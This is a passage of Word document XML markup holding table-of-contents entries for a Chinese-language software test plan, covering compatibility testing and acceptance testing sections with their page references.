            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>89</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71B37820" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630345" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>18.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>场景概述</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630345 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>89</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D144B08" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630346" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>18.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>执行策略设计</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630346 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>89</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E8F187E" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630347" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>18.4.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试数据需求</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630347 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>89</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="32AB8885" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630348" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>18.5.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>兼容性测试结果分析方法和预期结果</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630348 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>89</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79A11B9F" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630349" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>19.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>验收测试</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630349 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>91</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="34ADA3A4" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630350" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>19.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>验收测试简介</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630350 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>91</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="046B8E3E" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630351" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>19.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>验收测试目的</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630351 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>91</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D3C94D3" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630352" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>19.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试人员</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630352 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>91</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08263441" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630353" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>19.4.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试依据</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630353 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>91</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3CAF4DAC" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630354" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>19.5.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>验收测试范围</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630354 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>91</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C4391D5" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630355" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>19.6.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>验收测试准入条件</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630355 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>94</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="373E63C2" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630356" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>19.7.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>验收测试</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630356 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>94</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F85D8F9" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630357" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>19.8.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>验收完成</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630357 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
